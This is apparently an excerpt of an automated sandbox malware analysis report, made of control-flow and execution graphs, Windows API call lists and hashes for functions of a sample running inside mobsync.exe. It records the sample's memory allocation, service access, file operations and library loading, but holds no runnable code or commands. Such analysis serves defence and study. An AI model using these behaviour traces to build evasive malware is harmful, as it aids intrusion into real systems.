                                                                                control_flow_graph 642 3d0ad0-3d0b31 call 3d0ed0 645 3d0b47-3d0b4d 642->645 646 3d0b33-3d0b42 642->646 648 3d0b5f-3d0b7b 645->648 649 3d0b4f-3d0b54 645->649 647 3d0d40 646->647 651 3d0b7d-3d0b8e 648->651 652 3d0b90 648->652 649->648 653 3d0b96-3d0b9c 651->653 652->653 654 3d0bae-3d0bca 653->654 655 3d0b9e-3d0ba3 653->655 658 3d0bcc-3d0bd4 654->658 659 3d0bd7-3d0c21 VirtualAlloc 654->659 655->654 658->659 663 3d0d1a-3d0d24 659->663 664 3d0c27-3d0c2e 659->664 663->647 665 3d0c44-3d0c4b 664->665 666 3d0c30-3d0c3f 664->666 667 3d0c5d-3d0c79 665->667 668 3d0c4d-3d0c52 665->668 666->647 670 3d0c7b-3d0c83 667->670 671 3d0c86-3d0c8d 667->671 668->667 670->671 672 3d0c9f-3d0cbb 671->672 673 3d0c8f-3d0c94 671->673 675 3d0cbd-3d0cc5 672->675 676 3d0cc8-3d0cfa VirtualAlloc 672->676 673->672 675->676 679 3d0d02-3d0d07 676->679 679->663 680 3d0d09-3d0d18 679->680 680->647
                                                                                APIs
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003D0F08
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003D0F3E
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003D0F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000), ref: 003D0BFF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295897872.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3d0000_NlsLexicons0416.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 1654584625-0
                                                                                • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction ID: 1f3da323facaf34157dea2bf32b08612cbf99ecb483a9a545b8e83f129c9b151
                                                                                • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction Fuzzy Hash: 7D513871640218ABDB248F54DE45FEAB778EF14B01F004096FA08BB290D7B89D85CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D0170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003D0F08
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003D0F3E
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003D0F7F
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 003D02F6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295897872.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3d0000_NlsLexicons0416.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 223123264-0
                                                                                • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction ID: a7f04150ab309e2705018e92eaecd6225cbe348b236398991abf62e17ef9dbe8
                                                                                • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction Fuzzy Hash: AB513AB1901268ABDB24DF64DD84BDEB778EF88700F00459AF509BB250DB745A85CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 003D0010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295897872.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3d0000_NlsLexicons0416.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                                                • API String ID: 0-211638553
                                                                                • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction ID: 8be4295d5710e5e95664277dc7a3a0c03271423b3b459dc1fae1264883e3a5b7
                                                                                • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction Fuzzy Hash: B3311A39E511289BCB04DB98DD80AED7BB5FF48740F50802BD502737A4DB789986CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D06F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295897872.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3d0000_NlsLexicons0416.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction ID: ceae101b0aeaea2a6e8e5be104fb24c8c72ab36fb21e17cc3545f7d2b9fdb235
                                                                                • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction Fuzzy Hash: AC51A373A043016BD72ADF26E841B5BB7E8EBD4B94F04452FF548EB341E235D90497A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D08F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295897872.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3d0000_NlsLexicons0416.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction ID: 9859ed181ec90d29d9bbe07d3ea3eb9b1b0aee7ac33e3fd9302266de2a383c35
                                                                                • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction Fuzzy Hash: 124104776143026BC31ADB79EC45BABB399ABC4F50F09492FF640DA344D2B0D50887AA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: mobsync.exe PID: 2504 Parent PID: 2908 mobsync.exeCOMMON

                                                                                Execution Graph

                                                                                Execution Coverage:9.4%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1168
                                                                                Total number of Limit Nodes:13

                                                                                Graph

                                                                                execution_graph 6889 2c1928 6910 2c191f 6889->6910 6890 2c1bc6 6891 2c35c0 GetPEB 6890->6891 6893 2c1bd0 6891->6893 6892 2c1ba4 6894 2c1bf1 6893->6894 6895 2c3f00 GetPEB 6893->6895 6899 2c1c23 6894->6899 6900 2c3f00 GetPEB 6894->6900 6896 2c1be5 6895->6896 6897 2c3e60 GetPEB 6896->6897 6897->6894 6898 2c4e30 GetPEB 6898->6910 6902 2c1c4b 6899->6902 6904 2c3f00 GetPEB 6899->6904 6901 2c1c17 6900->6901 6903 2c3e60 GetPEB 6901->6903 6903->6899 6905 2c1c3f 6904->6905 6907 2c3e60 GetPEB 6905->6907 6906 2c3e60 GetPEB 6906->6910 6907->6902 6908 2c35c0 GetPEB 6908->6910 6909 2c3f00 GetPEB 6909->6910 6910->6890 6910->6892 6910->6898 6910->6906 6910->6908 6910->6909 7092 2c4869 7097 2c4870 7092->7097 7093 2c496e 7094 2c492c 7093->7094 7096 2c3f00 GetPEB 7093->7096 7095 2c3f00 GetPEB 7095->7097 7098 2c4981 7096->7098 7097->7093 7097->7094 7097->7095 7100 2c3e60 GetPEB 7097->7100 7099 2c3e60 GetPEB 7098->7099 7099->7094 7100->7097 5943 2c30a0 5951 2c30ba 5943->5951 5944 2c32ab 5945 2c3238 5944->5945 5953 2c3f00 GetPEB 5944->5953 5947 2c3291 RtlAllocateHeap 5947->5945 5947->5951 5948 2c3f00 GetPEB 5948->5951 5951->5944 5951->5945 5951->5947 5951->5948 5952 2c3e60 GetPEB 5951->5952 5952->5951 5954 2c32bf 5953->5954 5955 2c3e60 5954->5955 5956 2c3ebc 5955->5956 5957 2c3e9c 5955->5957 5956->5945 5957->5956 5958 2c3f00 GetPEB 5957->5958 5961 2c40f5 5957->5961 5959 2c40e9 5958->5959 5960 2c3e60 GetPEB 5959->5960 5960->5961 5962 2c3f00 GetPEB 5961->5962 5968 2c4126 5961->5968 5963 2c411a 5962->5963 5965 2c3e60 GetPEB 5963->5965 5964 2c3e60 GetPEB 5967 2c4157 5964->5967 5965->5968 5966 2c4138 5966->5945 5967->5945 5968->5964 5968->5966 5996 2c5ce0 6004 2c65e0 5996->6004 5998 2c5ce5 5999 2c5d09 ExitProcess 5998->5999 6000 2c3f00 GetPEB 5998->6000 6001 2c5cf8 6000->6001 6002 2c3e60 GetPEB 6001->6002 6003 2c5d04 6002->6003 6003->5999 6049 2c65fd 6004->6049 6007 2c706e 6345 2c8740 6007->6345 6009 2c68df 6009->5998 6010 2c6dcd 6320 2cb2e0 6010->6320 6012 2c3f00 GetPEB 6042 2c6927 6012->6042 6013 2c7061 6336 2c8d40 6013->6336 6020 2c6f27 GetTickCount 6020->6049 6027 2c7073 6027->5998 6032 2c3f00 GetPEB 6032->6049 6033 2c7066 6033->5998 6036 2c4220 GetPEB 6036->6049 6041 2c3e60 GetPEB 6041->6049 6042->6012 6042->6020 6043 2c6975 GetTickCount 6042->6043 6045 2c3e60 GetPEB 6042->6045 6043->6049 6045->6042 6048 2c4160 GetPEB 6048->6049 6049->6007 6049->6009 6049->6010 6049->6013 6049->6032 6049->6036 6049->6041 6049->6042 6049->6048 6050 2c8400 6049->6050 6056 2c7120 6049->6056 6077 2c8e80 6049->6077 6087 2c8970 6049->6087 6099 2c80a0 6049->6099 6111 2c9860 6049->6111 6127 2c9620 6049->6127 6136 2c12b0 6049->6136 6157 2cafe0 6049->6157 6162 2c8700 6049->6162 6168 2c6060 6049->6168 6189 2cb430 6049->6189 6196 2c9f30 6049->6196 6205 2c61e0 6049->6205 6217 2c94d0 6049->6217 6224 2c3310 6049->6224 6234 2c1840 6049->6234 6249 2c3460 6049->6249 6259 2c53d0 6049->6259 6264 2c9270 6049->6264 6274 2c8bb0 6049->6274 6284 2c72d0 6049->6284 6294 2c9050 6049->6294 6308 2c4770 6049->6308 6325 2cb1d0 6049->6325 6330 2c7410 6049->6330 6054 2c84e3 6050->6054 6051 2c85bd 6051->6049 6052 2c8600 CreateFileW 6052->6051 6052->6054 6053 2c3f00 GetPEB 6053->6054 6054->6051 6054->6052 6054->6053 6055 2c3e60 GetPEB 6054->6055 6055->6054 6061 2c7125 6056->6061 6057 2c7233 6363 2c34c0 6057->6363 6059 2c7232 6059->6049 6061->6057 6061->6059 6064 2c7080 GetPEB LoadLibraryW 6061->6064 6062 2c7265 LoadLibraryW 6065 2c727a 6062->6065 6066 2c7290 6062->6066 6063 2c3f00 GetPEB 6067 2c7254 6063->6067 6064->6061 6068 2c3f00 GetPEB 6065->6068 6072 2c72b8 6066->6072 6074 2c3f00 GetPEB 6066->6074 6069 2c3e60 GetPEB 6067->6069 6070 2c7284 6068->6070 6073 2c7260 6069->6073 6071 2c3e60 GetPEB 6070->6071 6071->6066 6072->6049 6073->6062 6075 2c72ac 6074->6075 6076 2c3e60 GetPEB 6075->6076 6076->6072 6078 2c8ea0 6077->6078 6079 2c901b 6078->6079 6080 2c8ff2 OpenServiceW 6078->6080 6081 2c8fc6 6078->6081 6083 2c3f00 GetPEB 6078->6083 6086 2c3e60 GetPEB 6078->6086 6079->6081 6082 2c3f00 GetPEB 6079->6082 6080->6078 6081->6049 6084 2c902e 6082->6084 6083->6078 6085 2c3e60 GetPEB 6084->6085 6085->6081 6086->6078 6096 2c8991 6087->6096 6088 2c8b74 6092 2c8add 6088->6092 6094 2c3f00 GetPEB 6088->6094 6090 2c3f00 GetPEB 6090->6096 6091 2c34c0 GetPEB 6091->6096 6092->6049 6093 2c3e60 GetPEB 6093->6096 6095 2c8b87 6094->6095 6097 2c3e60 GetPEB 6095->6097 6096->6088 6096->6090 6096->6091 6096->6092 6096->6093 6098 2c3460 GetPEB 6096->6098 6373 2c5040 6096->6373 6097->6092 6098->6096 6110 2c8163 6099->6110 6100 2c34c0 GetPEB 6100->6110 6101 2c8397 CreateFileW 6108 2c83e6 6101->6108 6101->6110 6102 2c83c7 6104 2c3f00 GetPEB 6102->6104 6102->6108 6103 2c8358 6103->6049 6105 2c83da 6104->6105 6107 2c3e60 GetPEB 6105->6107 6106 2c3e60 GetPEB 6106->6110 6107->6108 6108->6049 6109 2c3f00 GetPEB 6109->6110 6110->6100 6110->6101 6110->6102 6110->6103 6110->6106 6110->6109 6125 2c9880 6111->6125 6112 2c9b02 6114 2c9b26 SHGetFolderPathW 6112->6114 6117 2c3f00 GetPEB 6112->6117 6113 2c99b2 OpenSCManagerW 6113->6125 6398 2c3040 6114->6398 6116 2c9969 SHGetFolderPathW 6116->6125 6121 2c9b15 6117->6121 6118 2c9a66 CloseServiceHandle 6118->6125 6120 2c3f00 GetPEB 6120->6125 6123 2c3e60 GetPEB 6121->6123 6122 2c9af5 6122->6049 6124 2c9b21 6123->6124 6124->6114 6125->6112 6125->6113 6125->6116 6125->6118 6125->6120 6125->6122 6126 2c3e60 GetPEB 6125->6126 6403 2c7c60 6125->6403 6126->6125 6128 2c9630 6127->6128 6129 2c9829 6128->6129 6130 2c34c0 GetPEB 6128->6130 6131 2c981f 6128->6131 6134 2c3e60 GetPEB 6128->6134 6135 2c3f00 GetPEB 6128->6135 6427 2c3780 6129->6427 6130->6128 6131->6049 6133 2c9839 6133->6049 6134->6128 6135->6128 6156 2c12e1 6136->6156 6138 2c181c 6556 2c4220 6138->6556 6139 2c4220 GetPEB 6139->6156 6141 2c17d1 6141->6049 6142 2c42c0 GetPEB 6142->6156 6145 2c34c0 GetPEB 6145->6156 6147 2c3e60 GetPEB 6147->6156 6149 2c3f00 GetPEB 6149->6156 6150 2c1641 _snwprintf 6153 2c3460 GetPEB 6150->6153 6153->6156 6155 2c3460 GetPEB 6155->6156 6156->6138 6156->6139 6156->6141 6156->6142 6156->6145 6156->6147 6156->6149 6156->6150 6156->6155 6454 2c1fc0 6156->6454 6462 2c1e70 6156->6462 6471 2c5c00 6156->6471 6490 2c1c70 6156->6490 6506 2c2230 6156->6506 6514 2c2be0 6156->6514 6529 2c4ea0 6156->6529 6534 2c1900 6156->6534 6158 2caff8 6157->6158 6160 2cb101 6157->6160 6159 2c3f00 GetPEB 6158->6159 6158->6160 6161 2c3e60 GetPEB 6158->6161 6159->6158 6160->6049 6161->6158 6163 2c8709 6162->6163 6164 2c871f 6162->6164 6165 2c3f00 GetPEB 6163->6165 6164->6049 6166 2c8713 6165->6166 6167 2c3e60 GetPEB 6166->6167 6167->6164 6598 2c5500 6168->6598 6170 2c613c 6172 2c35c0 GetPEB 6170->6172 6171 2c6134 6171->6049 6174 2c6147 6172->6174 6173 2c3f00 GetPEB 6178 2c6074 6173->6178 6175 2c6168 6174->6175 6177 2c3f00 GetPEB 6174->6177 6181 2c61a2 6175->6181 6182 2c3f00 GetPEB 6175->6182 6176 2c3e60 GetPEB 6176->6178 6179 2c615c 6177->6179 6178->6170 6178->6171 6178->6173 6178->6176 6180 2c3e60 GetPEB 6179->6180 6180->6175 6185 2c3f00 GetPEB 6181->6185 6187 2c61ca 6181->6187 6183 2c6196 6182->6183 6184 2c3e60 GetPEB 6183->6184 6184->6181 6186 2c61be 6185->6186 6188 2c3e60 GetPEB 6186->6188 6187->6049 6188->6187 6191 2cb440 6189->6191 6190 2cb4ba 6190->6049 6191->6190 6608 2cab50 6191->6608 6624 2ca170 6191->6624 6645 2ca7a0 6191->6645 6665 2ca5e0 6191->6665 6203 2c9f40 6196->6203 6197 2ca01b 6199 2c9f64 6197->6199 6200 2c3f00 GetPEB 6197->6200 6198 2c3f00 GetPEB 6198->6203 6199->6049 6201 2ca02e 6200->6201 6202 2c3e60 GetPEB 6201->6202 6202->6199 6203->6197 6203->6198 6203->6199 6204 2c3e60 GetPEB 6203->6204 6204->6203 6213 2c6202 6205->6213 6208 2c42c0 GetPEB 6208->6213 6209 2c624b 6209->6049 6210 2c6490 6210->6049 6211 2c3e60 GetPEB 6211->6213 6212 2c3f00 GetPEB 6212->6213 6213->6208 6213->6209 6213->6211 6213->6212 6215 2c642d 6213->6215 6780 2c55b0 6213->6780 6789 2c4c80 6213->6789 6214 2c3f00 GetPEB 6214->6215 6215->6210 6215->6214 6216 2c3e60 GetPEB 6215->6216 6216->6215 6222 2c94f0 6217->6222 6218 2c95c2 6218->6049 6220 2c4c80 GetPEB 6220->6222 6221 2c3f00 GetPEB 6221->6222 6222->6218 6222->6220 6222->6221 6223 2c3e60 GetPEB 6222->6223 6798 2c46c0 6222->6798 6223->6222 6225 2c334a 6224->6225 6226 2c336f 6225->6226 6227 2c3f00 GetPEB 6225->6227 6230 2c3f00 GetPEB 6226->6230 6233 2c3397 6226->6233 6228 2c3363 6227->6228 6229 2c3e60 GetPEB 6228->6229 6229->6226 6231 2c338b 6230->6231 6232 2c3e60 GetPEB 6231->6232 6232->6233 6233->6049 6235 2c184c 6234->6235 6239 2c1862 6234->6239 6236 2c3f00 GetPEB 6235->6236 6237 2c1856 6236->6237 6238 2c3e60 GetPEB 6237->6238 6238->6239 6240 2c3f00 GetPEB 6239->6240 6244 2c188b 6239->6244 6241 2c187f 6240->6241 6242 2c3e60 GetPEB 6241->6242 6242->6244 6243 2c18ee 6243->6049 6244->6243 6813 2c25e0 6244->6813 6246 2c18d8 6247 2c18dc 6246->6247 6248 2c4220 GetPEB 6246->6248 6247->6049 6248->6243 6250 2c346d 6249->6250 6253 2c3483 6249->6253 6251 2c3f00 GetPEB 6250->6251 6252 2c3477 6251->6252 6254 2c3e60 GetPEB 6252->6254 6255 2c34ab 6253->6255 6256 2c3f00 GetPEB 6253->6256 6254->6253 6255->6049 6257 2c349f 6256->6257 6258 2c3e60 GetPEB 6257->6258 6258->6255 6261 2c53e0 6259->6261 6260 2c54b4 6260->6049 6261->6260 6262 2c3f00 GetPEB 6261->6262 6263 2c3e60 GetPEB 6261->6263 6262->6261 6263->6261 6271 2c9290 6264->6271 6266 2c949c 6267 2c9410 6266->6267 6268 2c3f00 GetPEB 6266->6268 6267->6049 6270 2c94af 6268->6270 6269 2c3f00 GetPEB 6269->6271 6272 2c3e60 GetPEB 6270->6272 6271->6266 6271->6267 6271->6269 6273 2c3e60 GetPEB 6271->6273 6828 2c1000 6271->6828 6272->6267 6273->6271 6281 2c8bc4 6274->6281 6275 2c8d1d 6837 2c36b0 6275->6837 6276 2c3780 2 API calls 6276->6281 6278 2c8d10 6278->6049 6280 2c34c0 GetPEB 6280->6281 6281->6275 6281->6276 6281->6278 6281->6280 6282 2c3e60 GetPEB 6281->6282 6283 2c3f00 GetPEB 6281->6283 6282->6281 6283->6281 6285 2c72d9 6284->6285 6286 2c72ef 6284->6286 6287 2c3f00 GetPEB 6285->6287 6289 2c7318 6286->6289 6291 2c3f00 GetPEB 6286->6291 6288 2c72e3 6287->6288 6290 2c3e60 GetPEB 6288->6290 6289->6049 6290->6286 6292 2c730c 6291->6292 6293 2c3e60 GetPEB 6292->6293 6293->6289 6307 2c9070 6294->6307 6295 2c91de 6295->6049 6296 2c91e4 6297 2c921f 6296->6297 6298 2c3f00 GetPEB 6296->6298 6302 2c9247 6297->6302 6304 2c3f00 GetPEB 6297->6304 6300 2c9213 6298->6300 6299 2c3f00 GetPEB 6299->6307 6303 2c3e60 GetPEB 6300->6303 6301 2c3e60 GetPEB 6301->6307 6302->6049 6303->6297 6305 2c923b 6304->6305 6306 2c3e60 GetPEB 6305->6306 6306->6302 6307->6295 6307->6296 6307->6299 6307->6301 6309 2c4785 6308->6309 6317 2c479b 6308->6317 6310 2c3f00 GetPEB 6309->6310 6312 2c478f 6310->6312 6311 2c47cb GetCurrentProcessId 6314 2c47d5 6311->6314 6315 2c3e60 GetPEB 6312->6315 6313 2c3f00 GetPEB 6316 2c47b7 6313->6316 6314->6049 6315->6317 6318 2c3e60 GetPEB 6316->6318 6317->6311 6317->6313 6319 2c47c3 6318->6319 6319->6311 6322 2cb2ec 6320->6322 6321 2c3f00 GetPEB 6321->6322 6322->6321 6323 2cb422 6322->6323 6324 2c3e60 GetPEB 6322->6324 6323->6009 6324->6322 6326 2cb1e0 6325->6326 6327 2cb2b2 6326->6327 6328 2c3e60 GetPEB 6326->6328 6329 2c3f00 GetPEB 6326->6329 6327->6049 6327->6327 6328->6326 6329->6326 6335 2c7420 6330->6335 6331 2c7608 6331->6049 6332 2c3f00 GetPEB 6332->6335 6333 2c3e60 GetPEB 6333->6335 6334 2c4fd0 GetPEB 6334->6335 6335->6331 6335->6332 6335->6333 6335->6334 6344 2c8d50 6336->6344 6337 2c8e3f 6338 2c4b70 2 API calls 6337->6338 6339 2c8e4f 6338->6339 6339->6033 6340 2c34c0 GetPEB 6340->6344 6341 2c8e29 6341->6033 6342 2c3e60 GetPEB 6342->6344 6343 2c3f00 GetPEB 6343->6344 6344->6337 6344->6340 6344->6341 6344->6342 6344->6343 6353 2c8753 6345->6353 6346 2c34c0 GetPEB 6346->6353 6347 2c88df 6347->6027 6348 2c8903 6351 2c3f00 GetPEB 6348->6351 6355 2c8922 6348->6355 6350 2c3f00 GetPEB 6350->6353 6354 2c8916 6351->6354 6352 2c8e80 2 API calls 6352->6353 6353->6346 6353->6347 6353->6348 6353->6350 6353->6352 6359 2c3780 2 API calls 6353->6359 6362 2c3e60 GetPEB 6353->6362 6856 2c7700 6353->6856 6356 2c3e60 GetPEB 6354->6356 6357 2c8955 6355->6357 6358 2c3f00 GetPEB 6355->6358 6356->6355 6357->6027 6360 2c8949 6358->6360 6359->6353 6361 2c3e60 GetPEB 6360->6361 6361->6357 6362->6353 6364 2c34e3 6363->6364 6365 2c3508 6364->6365 6366 2c3f00 GetPEB 6364->6366 6369 2c3f00 GetPEB 6365->6369 6371 2c3530 6365->6371 6367 2c34fc 6366->6367 6368 2c3e60 GetPEB 6367->6368 6368->6365 6370 2c3524 6369->6370 6372 2c3e60 GetPEB 6370->6372 6371->6062 6371->6063 6372->6371 6387 2c505c 6373->6387 6374 2c5367 6376 2c3f00 GetPEB 6374->6376 6378 2c5386 6374->6378 6375 2c53ae 6375->6096 6377 2c537a 6376->6377 6379 2c3e60 GetPEB 6377->6379 6378->6375 6382 2c3f00 GetPEB 6378->6382 6379->6378 6380 2c534d RtlAllocateHeap 6380->6375 6380->6387 6384 2c53a2 6382->6384 6383 2c3f00 GetPEB 6383->6387 6385 2c3e60 GetPEB 6384->6385 6385->6375 6386 2c3e60 GetPEB 6386->6387 6387->6374 6387->6375 6387->6380 6387->6383 6387->6386 6388 2c42c0 6387->6388 6389 2c42cd 6388->6389 6394 2c42e3 6388->6394 6390 2c3f00 GetPEB 6389->6390 6391 2c42d7 6390->6391 6393 2c3e60 GetPEB 6391->6393 6392 2c430b 6392->6387 6393->6394 6394->6392 6395 2c3f00 GetPEB 6394->6395 6396 2c42ff 6395->6396 6397 2c3e60 GetPEB 6396->6397 6397->6392 6399 2c3050 6398->6399 6401 2c307a 6399->6401 6413 2c38f0 6399->6413 6401->6122 6402 2c3092 6402->6122 6404 2c7c80 6403->6404 6405 2c7d97 6404->6405 6406 2c7ddd 6404->6406 6407 2c3f00 GetPEB 6404->6407 6410 2c3e60 GetPEB 6404->6410 6405->6125 6408 2c3f00 GetPEB 6406->6408 6412 2c7dfd 6406->6412 6407->6404 6409 2c7df1 6408->6409 6411 2c3e60 GetPEB 6409->6411 6410->6404 6411->6412 6412->6125 6425 2c3910 6413->6425 6414 2c3a3b FindFirstFileW 6417 2c3b8f 6414->6417 6414->6425 6415 2c3ac1 6415->6402 6416 2c3b70 6416->6417 6418 2c3f00 GetPEB 6416->6418 6417->6402 6419 2c3b83 6418->6419 6420 2c3e60 GetPEB 6419->6420 6420->6417 6421 2c34c0 GetPEB 6421->6425 6422 2c3e60 GetPEB 6422->6425 6423 2c3f00 GetPEB 6423->6425 6424 2c38f0 GetPEB 6424->6425 6425->6414 6425->6415 6425->6416 6425->6421 6425->6422 6425->6423 6425->6424 6426 2c3460 GetPEB 6425->6426 6426->6425 6428 2c3795 6427->6428 6429 2c37ab 6427->6429 6430 2c3f00 GetPEB 6428->6430 6433 2c37dd 6429->6433 6434 2c3f00 GetPEB 6429->6434 6431 2c379f 6430->6431 6432 2c3e60 GetPEB 6431->6432 6432->6429 6437 2c3812 6433->6437 6438 2c3f00 GetPEB 6433->6438 6435 2c37d1 6434->6435 6436 2c3e60 GetPEB 6435->6436 6436->6433 6441 2c384a 6437->6441 6442 2c3f00 GetPEB 6437->6442 6439 2c3806 6438->6439 6440 2c3e60 GetPEB 6439->6440 6440->6437 6445 2c3876 6441->6445 6446 2c3f00 GetPEB 6441->6446 6443 2c383e 6442->6443 6444 2c3e60 GetPEB 6443->6444 6444->6441 6449 2c38d1 SHFileOperationW 6445->6449 6450 2c3f00 GetPEB 6445->6450 6447 2c386a 6446->6447 6448 2c3e60 GetPEB 6447->6448 6448->6445 6449->6133 6451 2c38c0 6450->6451 6452 2c3e60 GetPEB 6451->6452 6453 2c38cc 6452->6453 6453->6449 6461 2c1fd2 6454->6461 6455 2c2208 6455->6156 6456 2c2212 6456->6455 6457 2c4220 GetPEB 6456->6457 6457->6455 6458 2c42c0 GetPEB 6458->6461 6459 2c3e60 GetPEB 6459->6461 6460 2c3f00 GetPEB 6460->6461 6461->6455 6461->6456 6461->6458 6461->6459 6461->6460 6470 2c1e86 6462->6470 6463 2c1f77 6464 2c3f00 GetPEB 6463->6464 6466 2c1f68 6463->6466 6465 2c1f98 6464->6465 6467 2c3e60 GetPEB 6465->6467 6466->6156 6467->6466 6468 2c3e60 GetPEB 6468->6470 6469 2c3f00 GetPEB 6469->6470 6470->6463 6470->6466 6470->6468 6470->6469 6472 2c5c26 6471->6472 6473 2c5c10 6471->6473 6477 2c3f00 GetPEB 6472->6477 6481 2c5c4e 6472->6481 6474 2c3f00 GetPEB 6473->6474 6475 2c5c1a 6474->6475 6476 2c3e60 GetPEB 6475->6476 6476->6472 6478 2c5c42 6477->6478 6479 2c3e60 GetPEB 6478->6479 6479->6481 6480 2c5cd2 6480->6156 6481->6480 6482 2c5c99 6481->6482 6483 2c3f00 GetPEB 6481->6483 6485 2c5cc1 6482->6485 6487 2c3f00 GetPEB 6482->6487 6484 2c5c8d 6483->6484 6486 2c3e60 GetPEB 6484->6486 6485->6156 6486->6482 6488 2c5cb5 6487->6488 6489 2c3e60 GetPEB 6488->6489 6489->6485 6491 2c1cf0 6490->6491 6494 2c1d06 6490->6494 6492 2c3f00 GetPEB 6491->6492 6493 2c1cfa 6492->6493 6495 2c3e60 GetPEB 6493->6495 6496 2c1dad 6494->6496 6497 2c3f00 GetPEB 6494->6497 6495->6494 6500 2c1de1 6496->6500 6501 2c3f00 GetPEB 6496->6501 6498 2c1da1 6497->6498 6499 2c3e60 GetPEB 6498->6499 6499->6496 6504 2c4ea0 GetPEB 6500->6504 6502 2c1dd5 6501->6502 6503 2c3e60 GetPEB 6502->6503 6503->6500 6505 2c1e15 6504->6505 6505->6156 6513 2c2255 6506->6513 6507 2c229c 6507->6156 6508 2c3f00 GetPEB 6508->6513 6509 2c25be 6510 2c25cd 6509->6510 6512 2c4220 GetPEB 6509->6512 6510->6156 6511 2c3e60 GetPEB 6511->6513 6512->6510 6513->6507 6513->6508 6513->6509 6513->6511 6527 2c2c1a 6514->6527 6515 2c2fcf 6518 2c2fee 6515->6518 6519 2c3f00 GetPEB 6515->6519 6517 2c2cae 6517->6156 6518->6156 6521 2c2fe2 6519->6521 6520 2c34c0 GetPEB 6520->6527 6522 2c3e60 GetPEB 6521->6522 6522->6518 6523 2c3f00 GetPEB 6523->6527 6524 2c3e60 GetPEB 6524->6527 6525 2c4220 GetPEB 6525->6527 6526 2c3460 GetPEB 6526->6527 6527->6515 6527->6517 6527->6520 6527->6523 6527->6524 6527->6525 6527->6526 6566 2c56f0 6527->6566 6575 2c2980 6527->6575 6532 2c4eb6 6529->6532 6530 2c4f3d 6530->6156 6531 2c3f00 GetPEB 6531->6532 6532->6530 6532->6531 6533 2c3e60 GetPEB 6532->6533 6533->6532 6555 2c191f 6534->6555 6535 2c1bc6 6536 2c35c0 GetPEB 6535->6536 6538 2c1bd0 6536->6538 6537 2c1ba4 6537->6156 6539 2c1bf1 6538->6539 6540 2c3f00 